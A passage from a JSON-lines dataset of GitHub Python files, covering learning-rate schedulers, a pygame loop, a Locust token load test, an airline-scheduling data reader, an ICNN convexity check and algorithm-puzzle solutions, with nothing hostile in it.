alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n lr = super().get_lr()\n return lr\n\n\nclass WarmupCosineLR(_LRScheduler):\n def __init__(self, optimizer, T_max, warmup_factor=1.0 / 3, warmup_iters=500,\n eta_min=0, last_epoch=-1):\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n self.T_max, self.eta_min = T_max, eta_min\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self):\n if self.last_epoch <= self.warmup_iters:\n alpha = self.last_epoch / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n return [self.eta_min + (base_lr - self.eta_min) *\n (1 + math.cos(\n math.pi * (self.last_epoch - self.warmup_iters) / (self.T_max - self.warmup_iters))) / 2\n for base_lr in self.base_lrs]\n\n\n\nclass WarmupPolyLR(_LRScheduler):#https://blog.csdn.net/sinat_36618660/article/details/99650804\n def __init__(self, optimizer, T_max, cur_iter, warmup_factor=1.0 / 3, warmup_iters=5,\n eta_min=0, power=0.9):\n\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n self.power = power\n self.T_max, self.eta_min = T_max, eta_min\n self.cur_iter = cur_iter\n super().__init__(optimizer)\n\n def get_lr(self):#从最初的小学习率开始,每个step增大一点点,直到达到最初设置的比较大的学习率时,采用最初设置的学习率进行训练。\n if self.cur_iter <= self.warmup_iters:\n alpha = self.cur_iter / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n return [self.eta_min + (base_lr - self.eta_min) *\n math.pow(1 - (self.cur_iter - self.warmup_iters) / (self.T_max - self.warmup_iters),\n self.power) for base_lr in self.base_lrs]\n\n\ndef poly_learning_rate(cur_epoch, max_epoch, curEpoch_iter, perEpoch_iter, baselr):\n cur_iter = cur_epoch * perEpoch_iter + curEpoch_iter\n max_iter = max_epoch * perEpoch_iter\n lr = baselr * pow((1 - 1.0 * cur_iter / max_iter), 0.9)\n\n return lr\n\n\n\nclass GradualWarmupScheduler(_LRScheduler):\n \"\"\" Gradually warm-up(increasing) learning rate in optimizer.\n Proposed in 'Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour'.\n Args:\n optimizer (Optimizer): Wrapped optimizer.\n min_lr_mul: target learning rate = base lr * min_lr_mul\n total_epoch: target learning rate is reached at total_epoch, gradually\n after_scheduler: after target_epoch, use this scheduler(eg. ReduceLROnPlateau)\n \"\"\"\n\n def __init__(self, optimizer, total_epoch, min_lr_mul=0.1, after_scheduler=None):\n self.min_lr_mul = min_lr_mul\n if self.min_lr_mul > 1. or self.min_lr_mul < 0.:\n raise ValueError('min_lr_mul should be [0., 1.]')\n self.total_epoch = total_epoch\n self.after_scheduler = after_scheduler\n self.finished = False\n super(GradualWarmupScheduler, self).__init__(optimizer)\n\n def get_lr(self):\n if self.last_epoch > self.total_epoch:\n if self.after_scheduler:\n if not self.finished:\n self.after_scheduler.base_lrs = self.base_lrs\n self.finished = True\n return self.after_scheduler.get_lr()\n else:\n return self.base_lrs\n else:\n return [base_lr * (self.min_lr_mul + (1. - self.min_lr_mul) * (self.last_epoch / float(self.total_epoch))) for base_lr in self.base_lrs]\n\n def step(self, epoch=None):\n if self.finished and self.after_scheduler:\n return self.after_scheduler.step(epoch - self.total_epoch)\n else:\n return super(GradualWarmupScheduler, self).step(epoch)\n\nclass WarmupLrScheduler(torch.optim.lr_scheduler._LRScheduler):\n\n def __init__(\n self,\n optimizer,\n warmup_iter=500,\n warmup_ratio=5e-4,\n warmup='exp',\n last_epoch=-1,\n ):\n self.warmup_iter = warmup_iter\n self.warmup_ratio = warmup_ratio\n self.warmup = warmup\n super(WarmupLrScheduler, self).__init__(optimizer, last_epoch)\n\n def get_lr(self):\n ratio = self.get_lr_ratio()\n lrs = [ratio * lr for lr in self.base_lrs]\n return lrs\n\n def get_lr_ratio(self):\n if self.last_epoch < self.warmup_iter:\n ratio = self.get_warmup_ratio()\n else:\n ratio = self.get_main_ratio()\n return ratio\n\n def get_main_ratio(self):\n raise NotImplementedError\n\n def get_warmup_ratio(self):\n assert self.warmup in ('linear', 'exp')\n alpha = self.last_epoch / self.warmup_iter\n if self.warmup == 'linear':\n ratio = self.warmup_ratio + (1 - self.warmup_ratio) * alpha\n elif self.warmup == 'exp':\n ratio = self.warmup_ratio ** (1. - alpha)\n return ratio\n\nclass WarmupPolyLrScheduler(WarmupLrScheduler):\n\n def __init__(\n self,\n optimizer,\n power,\n max_iter,\n warmup_iter=500,\n warmup_ratio=5e-4,\n warmup='exp',\n last_epoch=-1,\n ):\n self.power = power\n self.max_iter = max_iter\n super(WarmupPolyLrScheduler, self).__init__(\n optimizer, warmup_iter, warmup_ratio, warmup, last_epoch)\n\n def get_main_ratio(self):\n real_iter = self.last_epoch - self.warmup_iter\n real_max_iter = self.max_iter - self.warmup_iter\n alpha = real_iter / real_max_iter\n ratio = (1 - alpha) ** self.power\n return ratio\n\n\n\nif __name__ == '__main__':\n optim = WarmupPolyLR()\n","repo_name":"favoMJ/FEENet","sub_path":"utils/scheduler/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11653617833","text":"#! /usr/bin/env python\n\nfrom pygame.locals import KEYDOWN, K_ESCAPE, K_x, QUIT\n\nimport pygame\n\n\"\"\"\nIf using an older Raspberry Pi distro, you might need to run the following commands to get working sound:\n\nsudo apt-get install alsa-utils\nsudo modprobe snd_bcm2835\n\"\"\"\n\n# initialise pygame before we import anything else\npygame.mixer.pre_init(44100, -16, 2, 1024)\npygame.init()\n\nimport rpg.states\n\ndef playMain():\n # get the first state\n currentState = rpg.states.showTitle(True)\n # start the main loop\n clock = pygame.time.Clock() \n while True:\n clock.tick(rpg.states.FRAMES_PER_SEC)\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n return\n if event.type == KEYDOWN and event.key == K_x:\n # toggle sound\n rpg.states.soundHandler.toggleSound()\n rpg.states.musicPlayer.toggleMusic()\n # detect key presses \n keyPresses = pygame.key.get_pressed()\n # delegate key presses to the current state\n newState = currentState.execute(keyPresses)\n # flush sounds\n rpg.states.soundHandler.flush()\n # change state if necessary\n if newState:\n currentState = newState\n\n# this calls the playMain function when this script is executed\nif __name__ == '__main__': playMain()\n","repo_name":"samroyale/ulmo-game","sub_path":"src/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"70517413431","text":"from locust import HttpUser, TaskSet, task, between, SequentialTaskSet, User\nimport json\nfrom os import environ\n\ndef get_environment():\n if environ.get(\"TEST_CLIENT_ID\"):\n client_id = environ.get(\"TEST_CLIENT_ID\")\n client_secret = environ.get(\"TEST_CLIENT_SECRET\")\n return client_id, client_secret\n\ndef get_host():\n if environ.get(\"TEST_API_URL\"):\n host = environ.get(\"TEST_API_URL\")\n return host\n\n\nclass GetToken(TaskSet):\n\n @task\n def get_token(self):\n get_env = get_environment()\n client_id = get_env[0]\n client_secret = get_env[1]\n\n response = self.client.post(\"/auth/token\", json={\n \"client_id\": client_id,\n \"client_secret\": client_secret\n }\n )\n\n if (response.status_code == 200):\n body = response.json()\n token = body['access_token']\n self.jwt = f'Bearer {token}'\n print(self.jwt)\n return self.jwt\n else:\n print(f'Status Code: {response.status_code}')\n self.interrupt()\n\n\nclass WebsiteUser(HttpUser):\n host = get_host()\n\n tasks = [GetToken]\n wait_time = between(1, 1)\n","repo_name":"stixaw/Locustio-project","sub_path":"workschedule/Get_Token.py","file_name":"Get_Token.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10335918698","text":"import numpy as np\nimport sys\nfrom utilities import *\n\nfeat_path = sys.argv[1]\nimage_path = sys.argv[2]\n\nvgg_model = 'data/VGG_ILSVRC_19_layers.caffemodel'\nvgg_deploy = 'data/VGG_ILSVRC_19_layers_deploy.prototxt'\n\ncnn = CNN(model=vgg_model, deploy=vgg_deploy, width=224, height=224)\n\nfeats = cnn.get_features([image_path], layers='conv5_3', layer_sizes=[512,14,14])\nnp.save(feat_path, feats)\n\n","repo_name":"rahul411/Image-captioning-using-Attention","sub_path":"CreateDataForSingleImage.py","file_name":"CreateDataForSingleImage.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"43949149816","text":"import numpy as np\nimport pandas as pd\nimport datetime\n\nclass DataReader():\n\n def __init__(self, filename='', env_d=0):\n self.filename = filename\n self.env_d = env_d\n\n print(datetime.datetime.now(), 'Start - Load Data')\n self.df_excel = pd.read_excel(self.filename, sheetname=[0, 1, 2, 3, 4])\n\n self.df = self.df_excel[0].fillna(value=1.0)\n self.df = self.df.sort_values(by='航班ID', ascending=True)\n\n ################################################################################################################\n # 基准日期\n self.base_date = self.df['日期'].min()\n # 故障表/台风场景\n self.df_fault = self.df_excel[3]\n self.df_fault = self.df_fault.fillna(value=-1)\n\n ds_s = pd.to_datetime(self.df_fault['开始时间'])\n ds_e = pd.to_datetime(self.df_fault['结束时间'])\n\n ds_s_days = (ds_s - self.base_date).dt.days\n ds_s_seconds = (ds_s - self.base_date).dt.seconds\n ds_s_minutes = (ds_s_days * 24 * 60) + (ds_s_seconds / 60)\n\n ds_e_days = (ds_e - self.base_date).dt.days\n ds_e_seconds = (ds_e - self.base_date).dt.seconds\n ds_e_minutes = (ds_e_days * 24 * 60) + (ds_e_seconds / 60)\n\n self.df_fault['开始时间'] = ds_s_minutes\n self.df_fault['结束时间'] = ds_e_minutes\n # 增加一个 已停机数 字段\n self.df_fault['已停机数'] = 0.0\n\n # 航班飞机限制表\n self.df_limit = self.df_excel[1]\n\n # 机场关闭限制表\n self.df_close = self.df_excel[2]\n ds = pd.to_datetime(self.df_close['生效日期'])\n ds = (ds - self.base_date).dt.days\n self.df_close['生效日期'] = ds * 24 * 60\n ds = pd.to_datetime(self.df_close['失效日期'])\n ds = (ds - self.base_date).dt.days\n self.df_close['失效日期'] = ds * 24 * 60\n\n ds = pd.to_datetime(self.df_close['关闭时间'], format='%H:%M:%S')\n self.df_close['关闭时间'] = ds.dt.hour * 60 + ds.dt.minute\n ds = pd.to_datetime(self.df_close['开放时间'], format='%H:%M:%S')\n self.df_close['开放时间'] = ds.dt.hour * 60 + ds.dt.minute\n\n # 飞行时间表\n self.df_flytime = self.df_excel[4]\n\n print(datetime.datetime.now(), 'End - Load Data')\n # 生成默认环境\n #\n # 0~12 基本信息\n # 0航班ID,1日期(相对于基准日期的分钟),2国内/国际,3航班号,4起飞机场,5到达机场,\n # 6起飞时间(相对于基准时间的分钟数),7起飞时间(相对于0点的分钟数),8到达时间(相对于基准时间的分钟数),9到达时间(相对于0点的分钟数)\n # 10飞机ID,11机型,12重要系数(*100 取整数)\n #\n # 13~30 故障信息\n # 13、14、15起飞机场故障(状态、开始时间、结束时间),16、17、18降落机场故障(状态、开始时间、结束时间),\n # 19、20、21航班故障(状态、开始时间、结束时间),\n # 22、23、24飞机故障(状态、开始时间、结束时间),\n # 25、26、27、28起飞机场停机限制(状态、停机数、开始时间、结束时间),29、30、31、32降落机场停机限制(状态、停机数、开始时间、结束时间)\n #\n # 33~42 机场关闭信息\n # 33起飞机场关闭(相对于0点的分钟数),34起飞机场开放(相对于0点的分钟数),35起飞机场关闭起效日期,36起飞机场关闭失效日期,37是否起飞机场关闭\n # 38降落机场关闭(相对于0点的分钟数),39降落机场开放(相对于0点的分钟数),40降落机场关闭起效日期,41��落机场关闭失效日期,42是否降落机场关闭\n #\n # 43~50 先导、后继、过站时间、联程、中转等信息\n # 43先导航班ID,44后继航班ID,45过站时间(分钟数)、46是否联程航班,47联程航班ID\n # 48是否有中转、49中转类型(国内-国内:0、国内-国际:1、国际-国内:2、国际-国际:3)、50中转时间限制、51对应的出港航班\n #\n # 52~57 调整方法信息\n # 52是否取消(0-不取消,1-取消),53改变航班绑定的飞机(0-不改变,1-改为同型号其他飞机,2-改为不同型号飞机),\n # 54修改航班起飞时间(0-不修改,1-延误、2-提前),55联程拉直(0-不拉直,1-拉直,注:第一段设置为拉直后第二段状态为取消,或者用其他方式处理),\n # 56调机(0-不调,1-调),57时间调整量(分钟数)\n #\n # 58~ 硬约束状态\n # 58航站衔接,59航线-飞机限制,60机场关闭,61飞机过站时间,62台风场景,63边界禁止调整-最早,64边界禁止调整-最晚\n # 65是否是边际航班-最早,66是否是边际航班-最晚\n #\n # 67~ 航线-飞机限制\n # 67是否航线-飞机限制\n # 动态添加,长度为 self.df_limit.groupby(['起飞机场', '降落机场']).count().max()\n #\n\n limit_len = self.df_limit.groupby(['起飞机场', '降落机场']).count().max()[0]\n self.arr_env = np.zeros([len(self.df), self.env_d + limit_len], dtype=np.int32)\n\n print(datetime.datetime.now(), 'Start - BASIC Data')\n ################################################################################################################\n # 0~12 基本信息\n # 0航班ID,1日期(相对于基准日期的分钟),2国内/国际,3航班号,4起飞机场,5到达机场,\n # 6起飞时间(相对于基准时间的分钟数),7起飞时间(相对于0点的分钟数),8到达时间(相对于基准时间的分钟数),9到达时间(相对于0点的分钟数)\n # 10飞机ID,11机型,12重要系数(*10 取整数)\n # 航班ID\n self.arr_env[:, 0] = self.df['航班ID']\n # 日期\n ds = pd.to_datetime(self.df['日期'])\n ds = (ds - self.base_date).dt.days\n days_minutes = ds * 24 * 60\n self.arr_env[:, 1] = days_minutes\n self.df['日期'] = days_minutes\n # 国际=0/国内=1\n self.arr_env[:, 2] = self.df['国际/国内'].replace(['国际', '国内'], [0, 1])\n # 航班号\n self.arr_env[:, 3] = self.df['航班号']\n # 起飞/降落机场\n self.arr_env[:, 4] = self.df['起飞机场']\n self.arr_env[:, 5] = self.df['降落机场']\n # 起飞时间\n ds = pd.to_datetime(self.df['起飞时间'])\n ds_days = (ds - self.base_date).dt.days\n ds_seconds = (ds - self.base_date).dt.seconds\n ds_minutes_s = (ds_days * 24 * 60) + (ds_seconds / 60)\n self.arr_env[:, 6] = ds_minutes_s\n self.df['起飞时间'] = ds_minutes_s\n self.arr_env[:, 7] = ds.dt.hour * 60 + ds.dt.minute\n # 到达时间\n ds = pd.to_datetime(self.df['降落时间'])\n ds_days = (ds - self.base_date).dt.days\n ds_seconds = (ds - self.base_date).dt.seconds\n ds_minutes_e = (ds_days * 24 * 60) + (ds_seconds / 60)\n self.arr_env[:, 8] = ds_minutes_e\n self.df['降落时间'] = ds_minutes_e\n self.arr_env[:, 9] = ds.dt.hour * 60 + ds.dt.minute\n # 飞机ID\n self.arr_env[:, 10] = self.df['飞机ID']\n # 机型\n self.arr_env[:, 11] = self.df['机型']\n # 重要系数\n self.arr_env[:, 12] = self.df['重要系数'] * 100\n\n ################################################################################################################\n # 飞机ID-机型表\n # 飞机ID,机型\n self.df_plane_type = self.df[['飞机ID', '机型']].drop_duplicates()\n # 飞机ID表\n self.all_plane = np.array(self.df_plane_type['飞机ID'].drop_duplicates().sort_values())\n\n ################################################################################################################\n # 边界表\n # 飞机ID,最早起飞航班号,最早起飞机场,最晚起飞航班号,最晚起飞机场\n first_ = pd.DataFrame(self.df.groupby(['飞机ID'])['起飞时间', '飞机ID'].min())\n first_.columns = ['最早起飞时间', '飞机ID']\n last_ = pd.DataFrame(self.df.groupby(['飞机ID'])['起飞时间', '飞机ID'].max())\n last_.columns = ['最晚起飞时间', '飞机ID']\n\n self.df_first = pd.merge(first_, self.df, how='left'\n , left_on=['最早起飞时间', '飞机ID']\n , right_on=['起飞时间', '飞机ID'])[['飞机ID', '航班ID','最早起飞时间', '起飞机场', '降落机场']]\n\n self.df_last = pd.merge(last_, self.df, how='left'\n , left_on=['最晚起飞时间', '飞机ID']\n , right_on=['起飞时间', '飞机ID'])[['飞机ID', '航班ID', '最晚起飞时间', '起飞机场', '降落机场']]\n\n ################################################################################################################\n # 国内航班机场\n domestic_airport_d = self.df[(self.df['国际/国内'] == '国内')]['起飞机场']\n domestic_airport_a = self.df[(self.df['国际/国内'] == '国内')]['降落机场']\n self.domestic_airport = np.array(pd.concat([domestic_airport_d, domestic_airport_a]).drop_duplicates())\n # 所有机场列表\n airport_d = self.df['起飞机场']\n airport_a = self.df['降落机场']\n self.all_airports = np.array(pd.concat([airport_d, airport_a]).drop_duplicates())\n\n ################################################################################################################\n # 获取可能的最早和最晚起飞时间\n self.time_d_min = min(self.arr_env[:, 6]) - (6 * 60) # 减去最大可提前小时数6小时\n self.time_d_max = max(self.arr_env[:, 6]) + (24 * 60) # 加上最大可延误数24小时(国际航班不允许调机,国内航班最多延误24小时)\n\n print(datetime.datetime.now(), 'End - BASIC Data')\n\n # 附加状态的处理\n # 故障、航线-飞机限制、机场关闭限制\n def app_action(self):\n # 故障计数,即默认环境中需要被调整处理掉的数据\n fault_count_ = 0\n print(datetime.datetime.now(), 'Start - Att Data')\n for row in self.arr_env:\n line_id = row[0] # 航班ID\n airport_d = row[4] # 起飞机场\n airport_a = row[5] # 到达机场\n time_d = row[6] # 起飞时间\n time_a = row[8] # 到达时间\n time_d_0 = row[7] # 起飞时间,0点为基准\n time_a_0 = row[9] # 到达时间,0点为基准\n plane_id = row[10] # 飞机ID\n\n # 后继航班ID\n next_id = 0\n # 后继航班起飞时间\n next_time_d = 0\n\n ############################################################################################################\n # 43~50 先导、后继、过站时间、联程、中转等信息\n #\n # 43先导航班ID,44后继航班ID,45过站时间(分钟数)\n # 后继航班:飞机ID相同 起飞时间大于本航班降落时间 按起飞时间排序之后第一个航班\n r_ = self.df[(self.df['飞机ID'] == plane_id) & (self.df['起飞时间'] > time_d)].sort_values(by='起飞时间', ascending=True)\n if len(r_) > 0:\n # 本航班的后继航班\n next_id = r_.iloc[0][0]\n # 后继航班起飞时间\n next_time_d = r_.iloc[0][6]\n row[44] = next_id\n # 本航班的到达时间\n time_a_ = row[8]\n # 后继航班的先导航班即是本航班\n row_next = self.arr_env[next_id - 1]\n row_next[43] = row[0]\n # 后继航班的起飞时间\n time_d_ = row_next[6]\n # 过站时间\n row[45] = time_d_ - time_a_\n\n # 联程航班: 日期与航班号相同\n # 46是否联程航班,47联程航班ID\n if (row[1] == row_next[1]) & (row[3] == row_next[3]) :\n row[46] = 1\n # 联程航班第一段的ID就是后继航班ID\n row[47] = next_id\n # 联程航班第二段\n row_next[46] = 1\n row_next[47] = row[0]\n\n ############################################################################################################\n # 故障航班/台风场景\n # 13~30 故障信息\n #\n # 13、14、15起飞机场故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 起飞机场相同\n r_ = self.df_fault[(self.df_fault['影响类型'] == '起飞') & (airport_d == self.df_fault['机场'])]\n if len(r_) > 0 :\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[14] = t_s\n row[15] = t_e\n if (time_d > t_s) & (time_d < t_e):\n row[13] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n # 16、17、18降落机场故障(状态、开始时间、结束时间):降落时间在范围内 & (故障类型=飞行|降落) & 降落机场相同\n r_ = self.df_fault[(self.df_fault['影响类型'] == '降落') & (airport_a == self.df_fault['机场'])]\n if len(r_) > 0 :\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[17] = t_s\n row[18] = t_e\n if (time_a > t_s) & (time_a < t_e):\n row[16] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n # 19、20、21航班故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 航班ID相同\n # 22、23、24飞机故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 飞机ID相同\n # 25、26、27、28起飞机场停机限制(状态、停机限制数量、开始时间、结束时间):起飞机场停机不做控制,停机故障都放在降落机场上处理\n\n # 29、30、31、32降落机场停机限制(状态、停机限制数量、开始时间、结束时间):\n # 时间在范围内(本航班的降落时间<结束时间 & 后继班的起飞时间>开始时间) & 故障类型=停机 & 降落机场相同\n # 有后继航班\n if next_id > 0:\n r_ = self.df_fault[(self.df_fault['影响类型'] == '停机') & (airport_a == self.df_fault['机场'])]\n\n if len(r_) > 0:\n self.df_fault.loc[r_.index, ['已停机数']] += 1\n\n p_num = 0\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[30] = p_num\n row[31] = t_s\n row[32] = t_e\n if (time_a < t_e) & (next_time_d > t_s):\n row[29] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n # 无后继航班的状态\n else:\n r_ = self.df_fault[(self.df_fault['影响类型'] == '停机') & (airport_a == self.df_fault['机场'])]\n\n if len(r_) > 0:\n self.df_fault.loc[r_.index, ['已停机数']] += 1\n\n p_num = 0\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[30] = p_num\n row[31] = t_s\n row[32] = t_e\n if (time_a < t_e) & (time_a > t_s):\n row[29] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n ############################################################################################################\n # 33~42 机场关闭信息\n # 33起飞机场关闭(相对于0点的分钟数),34起飞机场开放(相对于0点的分钟数),35起飞机场关闭起效日期,36起飞机场关闭失效日期,37是否起飞机场关闭\n # 起飞机场ID一致 & 起飞时间在机场关闭的生效与失效日期之内\n rows = np.array(self.df_close[(self.df_close['机场'] == airport_d)])\n for row_ in rows:\n # 关闭和开放时间之间跨越24点的处理\n if row_[2] < row_[1]:\n row_[2] += 24 * 60\n\n row[33] = row_[1]\n row[34] = row_[2]\n row[35] = row_[3]\n row[36] = row_[4]\n if (time_d >= row_[3]) & (time_d <= row_[4]) & (time_d_0 > row_[1]) & (time_d_0 < row_[2]):\n row[37] = 1\n\n # 38降落机场关闭(相对于0点的分钟数),39降落机场开放(相对于0点的分钟数),40降落机场关闭起效日期,41降落机场关闭失效日期,42是否降落机场关闭\n # 降落机场ID一致 & 降落时间在机场关闭的生效与失效日期之内\n rows = np.array(self.df_close[(self.df_close['机场'] == airport_a)])\n for row_ in rows:\n # 关闭和开放时间之间跨越24点的处理\n if row_[2] < row_[1]:\n row_[2] += 24 * 60\n\n row[38] = row_[1]\n row[39] = row_[2]\n row[40] = row_[3]\n row[41] = row_[4]\n if (time_a >= row_[3]) & (time_a <= row_[4]) & (time_a_0 > row_[1]) & (time_a_0 < row_[2]):\n row[42] = 1\n\n ############################################################################################################\n # 中转航班信息: 添加在有中转的进港航班上\n # 48是否有中转(0非中转、1中转)\n # 49中转类型(国内-国内:0、国内-国际:1、国际-国内:2、国际-国际:3)\n # 50中转时间限制\n # 51对应的出港航班\n\n ############################################################################################################\n # 65是否是边际航班-最早,66是否是边际航班-最晚\n r_f_ = self.df_first[self.df_first['航班ID'] == line_id]\n r_l_ = self.df_last[self.df_last['航班ID'] == line_id]\n if len(r_f_) > 0:\n row[65] = 1\n if len(r_l_) > 0:\n row[66] = 1\n\n ############################################################################################################\n # 67~ 航线-飞机限制\n # 67是否航线-飞机限制(0不限制,1限制)\n # 动态添加,长度为 self.df_limit.groupby(['起飞机场', '降落机场']).count().max()\n arr_limit = np.array(self.df_limit[((self.df_limit['起飞机场'] == airport_d)\n & (self.df_limit['降落机场'] == airport_a))]['飞机ID'])\n\n if len(arr_limit) > 0:\n row[68: 68 + len(arr_limit)] = arr_limit\n if plane_id in arr_limit:\n row[67] = 1\n\n ################################################################################################################\n # 获取特殊过站时间表(即初始环境下过站时间就小于50分钟的航班)\n df_special_passtime = pd.DataFrame(self.arr_env)\n df_special_passtime = df_special_passtime[(df_special_passtime[45] < 50)\n & (df_special_passtime[44] != 0)][[0, 44, 45]]\n df_special_passtime.columns = ['航班ID', '后继航班ID', '过站时间']\n\n print(datetime.datetime.now(), 'End - Att Data')\n return fault_count_, df_special_passtime\n\n def read(self, is_save = False, filename = ''):\n fault_count_, df_special_passtime = self.app_action()\n\n if is_save:\n np.save(filename, [self.arr_env , fault_count_, df_special_passtime])\n\n return self.arr_env, fault_count_, df_special_passtime\n\n\n def read_fromfile(self, filename):\n data_ = np.load(filename)\n self.arr_env = data_[0]\n fault_count_ = data_[1]\n df_special_passtime = data_[2]\n\n return self.arr_env, fault_count_, df_special_passtime\n\n# reader = DataReader(filename='DATA_20170705.xlsx' , env_d=59)\n# print(reader.read())\n","repo_name":"xyskywalker/DQN","sub_path":"AirLine_Phase_I/DataReader.py","file_name":"DataReader.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"17691836630","text":"'''\nCoroutines\n• Coroutines are functions whose processing can be suspended and\nresumed at specific points. So, typically, a coroutine will execute up to\na certain statement, then suspend execution while waiting for some\ndata. At this point other parts of the program can continue to execute\n(usually other coroutines that aren’t suspended).\n'''\n\n#import coroutines\n#from coroutines import finditer, send\n#import types \nfrom types import coroutine\n#Coroutines\n@coroutine\ndef regex_matcher(receiver, regex):\n\twhile True:\n\t\ttext = (yield)\n\t\tfor match in regex.finditer(text):\n\t\t\treceiver.send(match)\n\n\n\n\n","repo_name":"azatsatklichov/z-Py","sub_path":"py3-kurz2/g-practices/coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"26276487342","text":"import torch\nfrom src.mapficnn import MapFICNN\nfrom src.pcpmap import PCPMap\n\n\nclass ConvTest:\n \"\"\"\n Checks function convexity by minimizing the minimum of\n hessian / minimum of eigenvalues of hessian. If the value\n is positive then we claim convexity\n \"\"\"\n def __init__(self, icnn):\n \"\"\"\n :param icnn: neural network\n \"\"\"\n self.icnn = icnn\n\n def conv_test_ficnn(self, x):\n \"\"\"\n Convexity test for FICNN network\n :param x: the first i-1 / first block component of target sample x\n :return: minimum of hessian / eigenvalues of hessian\n \"\"\"\n mapficnn = MapFICNN(None, self.icnn)\n\n def closure():\n optimizer.zero_grad()\n hessian = mapficnn.gyinv_grad(x)\n if x.shape[1] > 1:\n loss = torch.min(torch.linalg.eigvalsh(hessian))\n else:\n loss = torch.min(hessian)\n loss.backward()\n return loss\n\n optimizer = torch.optim.LBFGS(mapficnn.parameters(), line_search_fn=\"strong_wolfe\",\n max_iter=1000000)\n optimizer.step(closure)\n eig_min = closure()\n return eig_min\n\n def conv_test_picnn(self, x, y):\n \"\"\"\n Convexity test for PICNN network\n :param x: non-input-convex component\n :param y: input-convex component\n :return: minimum of hessian / eigenvalues of hessian\n \"\"\"\n mappicnn = PCPMap(None, self.icnn)\n\n def closure():\n optimizer.zero_grad()\n hessian = mappicnn.gxinv_grad(y, x)\n if y.shape[1] > 1:\n loss = torch.min(torch.linalg.eigvalsh(hessian))\n else:\n loss = torch.min(hessian)\n loss.backward()\n return loss\n\n optimizer = torch.optim.LBFGS(mappicnn.parameters(), line_search_fn=\"strong_wolfe\",\n max_iter=1000000)\n optimizer.step(closure)\n eig_min = closure()\n return eig_min\n\n\nif __name__ == \"__main__\":\n\n from src.icnn import PICNN\n x = torch.randn(100, 2).requires_grad_(True)\n y = torch.randn(100, 3).requires_grad_(True)\n picnn = PICNN(3, 2, 128, 128, 1, 6)\n ConvTest1 = ConvTest(icnn=picnn)\n eig = ConvTest1.conv_test_picnn(x, y)\n print(\"Minimum Eigenvalue:\", eig)\n","repo_name":"EmoryMLIP/PCP-Map","sub_path":"test/conv_test.py","file_name":"conv_test.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29846281432","text":"import sys\nsys.stdin = open('BOJ_1703.txt', 'r')\n\nwhile True:\n data = list(map(int, input().split()))\n a = data[0]\n if a == 0:\n break\n\n result = 1\n for i in range(1, 2*a, 2):\n splittingFactor = data[i]\n branching = data[i+1]\n\n result *= splittingFactor\n result -= branching\n\n print(result)","repo_name":"Sanghyeok-Jeon/Algorithm","sub_path":"Python/BAEKJOON/BOJ_1703_생장점.py","file_name":"BOJ_1703_생장점.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74323670070","text":"# N x N 크기인 체스판 위에 N개의 퀸을 놓는다.\n# 한 자리에 위치한 퀸에 대해 같은 x축 선상, y축 선상, 그리고 대각선 방향에 대해 퀸이 존재할 수는 없다.\n\n# 백트래킹을 사용해야 한다.\n# 우선 모든 좌표에 대해 검사를 진행해야 한다.\n# 한 좌표에다 놓고 다음 퀸을 놓는 과정에서 조건이 맞지 않으면 돌아가야 한다.\n\n# 시간 제한이 10초다! 여태까지 만나본 문제중에 가장 시간이 널널한 문제인데, 막상 풀다보면 여유롭지 그럴거같다...\n# 재귀를 이용할 것이기에 재귀의 깊이 초과, 시간 초과등을 조심해야 한다.\n\ndef check(x):\n for j in range(0, x):\n if arr[x] == arr[j]:\n return False\n elif abs(x - j) == abs(arr[x] - arr[j]):\n return False\n return True\n\ndef Queen(n, k):\n global cnt\n\n if n == k:\n cnt += 1\n return\n\n for i in range(0, N):\n arr[n] = i\n if check(n):\n Queen(n + 1, k)\n\n\nN = int(input())\narr = [0] * N # 체스판\ncnt = 0\n\nQueen(0, N)\nprint(cnt)","repo_name":"applevalley/Problem-Solving","sub_path":"BOJ/9663. 